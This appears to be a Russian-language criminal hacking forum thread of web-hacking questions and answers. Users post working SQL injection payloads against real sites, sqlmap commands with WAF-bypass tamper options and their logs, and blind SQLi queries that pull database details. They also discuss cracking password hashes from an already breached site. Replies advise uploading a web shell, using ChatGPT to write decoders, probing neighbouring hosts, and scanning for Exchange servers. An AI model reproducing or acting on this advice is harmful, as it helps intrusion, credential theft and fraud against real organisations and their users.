• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Отслеживать
добрый день. инвикти нашел дырку в сайте, но, не получается раскрутить сайт, есть идеи или советы?
вот что пробовал:
1. запрос с инвикти
2. хеадеры в файл и -r
3. запрос с инвикти, но предварительно убрав куки и тп, лишние хеадеры

Код: 
POST /collection/ajax.dev HTTP/1.1
Host: www.site.io
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 119
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=dvmmjoh5vg9h9pco6kifojiqgq
Referer: https://www.site.io/collection/?hl=ru
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
X-Requested-With: XMLHttpRequest

contract_address%5B%5D=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27+%2f*+a6b61087-d32e-4178-886f-0ac1efa83111+*%2f








второй вопрос)

есть сайт, уже слитый, но вся проблема в том, что там пароли в хеше, при чем хеш показывает ша1 или ша256, но они вообще никак не поддаются расшифровке, по этому я пришел к выводу, что шифровка самописная и расшифровать не получится без разбора. Писал --passwords, выдает юзеров и пароли (хеши офк). Но чтобы зайти в phpmyadmin, нужно его найти, по стандартным путям /phpmyadmin и похожим, не было входа, нужный порт для коннекта через софт - закрыт. Вопрос, можно ли как то зайти в админку (скл) имея расшифрованый пас, но при этом эти два способа вычеркнув?
 
cfx сказал(а):
добрый день. инвикти нашел дырку в сайте, но, не получается раскрутить сайт, есть идеи или советы?
вот что пробовал:
1. запрос с инвикти
2. хеадеры в файл и -r
3. запрос с инвикти, но предварительно убрав куки и тп, лишние хеадеры

Код: 
POST /collection/ajax.dev HTTP/1.1
Host: www.site.io
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 119
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=dvmmjoh5vg9h9pco6kifojiqgq
Referer: https://www.site.io/collection/?hl=ru
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
X-Requested-With: XMLHttpRequest

contract_address%5B%5D=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27+%2f*+a6b61087-d32e-4178-886f-0ac1efa83111+*%2f








второй вопрос)

есть сайт, уже слитый, но вся проблема в том, что там пароли в хеше, при чем хеш показывает ша1 или ша256, но они вообще никак не поддаются расшифровке, по этому я пришел к выводу, что шифровка самописная и расшифровать не получится без разбора. Писал --passwords, выдает юзеров и пароли (хеши офк). Но чтобы зайти в phpmyadmin, нужно его найти, по стандартным путям /phpmyadmin и похожим, не было входа, нужный порт для коннекта через софт - закрыт. Вопрос, можно ли как то зайти в админку (скл) имея расшифрованый пас, но при этом эти два способа вычеркнув?
1. Ну тут хз, без самого сайта только гадать. При таком запросе ответ приходит с задержкой в 25 секунд? Менял на 10,5,0 ? Может ты при скане нагрузил сервак и он выплюнул ответ поздно, а сканер посчитал что есть time-based sql.
2. Посмотри соседей, может у кого-то есть админер и т.д. Проверь привелегии пользователя --privileges, может ты можешь писать/читать файлы.
 
Уважаемые форумчане , помогите разобраться с Citrix
при в ходе через WEB вожу url вылазит окно авторизаций далее просит скачать приложение Citrix Receiver . А со скаченным приложением на виртуалке просксифицировал весь трафик под гео и такая же ошибка
"Не удалось добавить учетную запись с указанным URL-адресом сервера. Проверьте правильность этого адреса или введите свой адрес электронной почты."
это фрод ? надо подстраиваться лучше
 
Пожалуйста, обратите внимание, что пользователь заблокирован
cfx сказал(а):
добрый день. инвикти нашел дырку в сайте, но, не получается раскрутить сайт, есть идеи или советы?
вот что пробовал:
1. запрос с инвикти
2. хеадеры в файл и -r
3. запрос с инвикти, но предварительно убрав куки и тп, лишние хеадеры

Код: 
POST /collection/ajax.dev HTTP/1.1
Host: www.site.io
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 119
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=dvmmjoh5vg9h9pco6kifojiqgq
Referer: https://www.site.io/collection/?hl=ru
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
X-Requested-With: XMLHttpRequest

contract_address%5B%5D=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27+%2f*+a6b61087-d32e-4178-886f-0ac1efa83111+*%2f








второй вопрос)

есть сайт, уже слитый, но вся проблема в том, что там пароли в хеше, при чем хеш показывает ша1 или ша256, но они вообще никак не поддаются расшифровке, по этому я пришел к выводу, что шифровка самописная и расшифровать не получится без разбора. Писал --passwords, выдает юзеров и пароли (хеши офк). Но чтобы зайти в phpmyadmin, нужно его найти, по стандартным путям /phpmyadmin и похожим, не было входа, нужный порт для коннекта через софт - закрыт. Вопрос, можно ли как то зайти в админку (скл) имея расшифрованый пас, но при этом эти два способа вычеркнув?
по хешам поищи декод функцию залей шелл м выведи через него росшифрованый вариант или просто поищи в коде сайта который шифрует закинь в чатгпт он тебе сам декод напишет
 
Хай, подскажите пожалуйстап кто сталкивался? возможно это как то обойти. [03:28:14] [CRITICAL] WAF/IPS identified as 'SiteGround'

Код: 
[03:28:13] [DEBUG] used the default behavior, running in batch mode
[03:28:14] [DEBUG] declared web page charset 'utf-8'
[03:28:14] [CRITICAL] WAF/IPS identified as 'SiteGround'
[03:28:14] [WARNING] potential CAPTCHA protection mechanism detected
[03:28:14] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[03:28:14] [INFO] testing if the target URL content is stable
[03:28:14] [DEBUG] got HTML meta refresh header

Код: 
[03:32:21] [DEBUG] setting match ratio for current parameter to 0.031
[03:32:21] [CRITICAL] target URL content appears to be heavily dynamic. sqlmap is going to retry the request(s)
[03:32:22] [DEBUG] got HTML meta refresh header
[03:32:23] [DEBUG] got HTML meta refresh header
[03:32:24] [DEBUG] got HTML meta refresh header
[03:32:24] [DEBUG] got HTML meta refresh header
[03:32:25] [DEBUG] got HTML meta refresh header
[03:32:26] [DEBUG] got HTML meta refresh header
[03:32:27] [WARNING] target URL content appears to be too dynamic. Switching to '--text-only'
[03:32:27] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[03:32:27] [PAYLOAD] 1654
[03:32:27] [DEBUG] got HTML meta refresh header
[03:32:28] [INFO] (custom) POST parameter '#1*' appears to be dynamic
[03:32:28] [PAYLOAD] testing@example.com(..,,,.('"
[03:32:28] [DEBUG] got HTML meta refresh header
[03:32:28] [DEBUG] heuristic check stopped because of heavy dynamicity
[03:32:28] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[03:32:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:32:29] [PAYLOAD] com
[03:32:29] [DEBUG] got HTML meta refresh header
[03:32:29] [PAYLOAD] testing@example.com) AND 5822 BETWEEN 1042 AND 1042-- giyG
[03:32:30] [DEBUG] got HTML meta refresh header
[03:32:30] [PAYLOAD] testing@example.com) AND 9208 BETWEEN 9208 AND 9208-- rmWp
[03:32:31] [DEBUG] got HTML meta refresh header
[03:32:31] [PAYLOAD] testing@example.com) AND 6508 BETWEEN 1221 AND 1221-- zmYI
[03:32:32] [DEBUG] got HTML meta refresh header
[03:32:32] [PAYLOAD] testing@example.com' AND 8200 BETWEEN 5403 AND 5403-- moNX
[03:32:32] [WARNING] user aborted during detection phase

За ранее спасибо.
 
Имеется инъекция такого вида:

Код: 
SELECT * FROM SGMSDB.DOMAINS WHERE TENANT_SERIAL = ' abc' union select (select ID from SGMSDB.DOMAINS limit 1), '1', '2', '3', '4', '5', #{SQL}, '7', '8', '9'

где в #{SQL} можно воткнуть произвольную выборку которая вернётся в ответе. То есть TENANT_SERIAL уязвимый параметр. Такой вопрос - можно ли сделать update/insert из такого запроса как-то?
 
Could anybody give me some advice on how to identify/find microsoft exchange servers (with out shodan). I've masscanned common ports ms exchange runs on, but when I run nuclei's ms-exchange-server.yaml template against the list, I'm not getting any results. Should I be normalizing my list differently? Right now I just normalize the masscan results to IP:PORT (no https://).
 
Пожалуйста, обратите внимание, что пользователь заблокирован
bzhk сказал(а):
Мне нужно подобрать подходящий эксплоит чтоб провести SQL инъекцию.
Как определить db веб-сервера?
man sqlmap
 
Искал руками в URL запросе xss
example.com/%3Cscript%3Ealert(777)%3C%2Fscript%3E

В ответ прилетела пустая страница не найдено.
А обычный формат 404 в виде цветной HTML


example.com/%2F => Not Found (эти данные не фильтруются)
Это и есть SQL Injection?
Как мне ее раскрутить?
 
Последнее редактирование:
SQLmap

sqlmap -r $file -v6 --banner --batch --flush-session --level=5 --risk=3 --delay=5 --dbs --dbms=MySQL --tamper=charencode,space2comment,space2plus,modsecurityversioned

[TRAFFIC OUT] HTTP request
...
[TRAFFIC IN] HTTP response (500 Internal Server Error):
[DEBUG] got HTTP error code: 500 ('Internal Server Error')


[PAYLOAD] Reviews%5BorderId%5D=*&Reviews%5Brate%5D=*&Reviews%5Bbody%5D=*&Reviews%5Bcaptcha%5D=&yt1=*#



Прочитал что внутренняя ошибка 500 означает, что полезная нагрузка SQLmap обнаружена и не может полностью использовать цель.

Как правильно раскрутить sql inj?
 
Последнее редактирование:
bzhk сказал(а):
SQLmap

sqlmap -r $file -v6 --banner --batch --flush-session --level=5 --risk=3 --delay=5 --dbs --dbms=MySQL --tamper=charencode,space2comment,space2plus,modsecurityversioned

[TRAFFIC OUT] HTTP request
...
[TRAFFIC IN] HTTP response (500 Internal Server Error):
[DEBUG] got HTTP error code: 500 ('Internal Server Error')


[PAYLOAD] Reviews%5BorderId%5D=*&Reviews%5Brate%5D=*&Reviews%5Bbody%5D=*&Reviews%5Bcaptcha%5D=&yt1=*#



Прочитал что внутренняя ошибка 500 означает, что полезная нагрузка SQLmap обнаружена и не может полностью использовать цель.

Как правильно раскрутить sql inj?
Вектор, который пытется раскрутить - error-based?
Запроксируй запросы в burp и смотри на что ругается WAF и как обойти.
Ну и банально попробуй --ignore-code=500
 
Добрый вечер, есть кейс с интересной инъекцией, крутил руками несколько дней, так и не докрутился.
К слову в sqlmap почти не крутил.

Вводные:
Post запрос, идет на api через параметр "SearchText"

Первый успех после потыкиваний в burp'e - узнал бд:

Код: 
if(ASCII(SUBSTRING((SELECT DATABASE()),1,1))>115,6,sleep(2))# t43
текущая бд - info_bides

Затем субд:
Код: 
if(ASCII(SUBSTRING((SELECT VERSION()),1,1))>88,sleep(2),33)# wg
СУБД 10.4.11 mariaDB

Ну и пользователя:

Код: 
if(ASCII(SUBSTRING((SELECT USER()),18,1))>1,sleep(2),33)# wg
USER() - webuser@117.0.0.1

Интересное начинается здесь:

Попытался узнать имена таблиц:
Код: 
if(ASCII(SUBSTRING((SELECT count(*) FROM information_schema.schemata limit 1),1,1))>0,6,sleep(2))#6
И тут что-то пошло не по плану, запрос не прошел "что-то". Я начал искать, что же отличает данный запрос от предыдущих.
Пришел к выводу, что это _

Решил проверить, может у меня прав на чтение нет, я новичок в этом, поэтому просто сделал так:

Код: 
if(ASCII(SUBSTRING((SELECT count(*) FROM mysql.user limit 1),1,1))=49,0,sleep(2))#/*
И мне посимвольно вернуло 16. По идее 'mysql' требует такие же права на чтение, как и 'information_schema' ? Я почти уверен, что да.

Решил еще раз протестировать свою теорию и проверить другим (бесполезным) запросом:
Код: 
if(ASCII(SUBSTRING(CURRENT_TIMESTAMP(),1,1))>1,44,sleep(2))# t43
Как я и думал, его тоже не пропустило. Нижнее подчеркивание во всем виновато...
Я много проверял, уверен, что дело в _.

Кто-то сталкивался с таким фильтром ввода? Как на зло текущая БД - info_bides. Тоже фильтруется))
Я уже много чего прочитал, думал обфусцировать FROM information_schema в FROM informationCHAR(95)schema (легкий пример) и т.д.
Но потом узнал, что в mariaDB и mysql нельзя динамически составлять данные после FROM.
Думал еще, в подзапросе передать _ через SUBSTRING(select DATABASE(),5,1) и потом собрать как-то..

1) Может направите куда посмотреть, что почитать?
2) Или может есть какой-то вектор по обходу фильтра данного спец символа?

Whatwaf определяет так:
Код: 
[FIREWALL] detected website protection identified as 'ASP.NET Generic Website Protection (Microsoft)'

Тоже интересный момент, после комментария (в конец запроса) могу ставить !@#$%^&*()></?'" и \\(обязательно двойные) , в этом случае запрос нормально выполняется. Опять же, как только подставлю _ в конец запроса, он не проходит.

3) Я могу как-то узнать, что происходит с _ после фильтрации?

P.S. Если кто-то хочет узнать сайт или посмотреть полный запрос - PM. Гео eu.
 
Просканировал порты web app показал результаты

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Cloudflare http proxy
443/tcp open ssl/http syn-ack ttl 64 Cloudflare http proxy
2052/tcp open http syn-ack ttl 64 Cloudflare http proxy
2053/tcp open ssl/http syn-ack ttl 64 nginx
2082/tcp open http syn-ack ttl 64 Cloudflare http proxy
2083/tcp open ssl/http syn-ack ttl 64 nginx
2086/tcp open http syn-ack ttl 64 Cloudflare http proxy
2095/tcp open http syn-ack ttl 64 Cloudflare http proxy
2096/tcp open ssl/http syn-ack ttl 64 nginx
8080/tcp open http syn-ack ttl 64 Cloudflare http proxy
8443/tcp open ssl/http syn-ack ttl 64 Cloudflare http proxy
8880/tcp open http syn-ack ttl 64 Cloudflare http proxy


Возможно что по этому IP нет SQL базы данных?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
bzhk сказал(а):
Возможно что по этому IP нет SQL базы данных?
возможно и так. А скорее всего если она там есть, то она доступна только с локалхоста)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх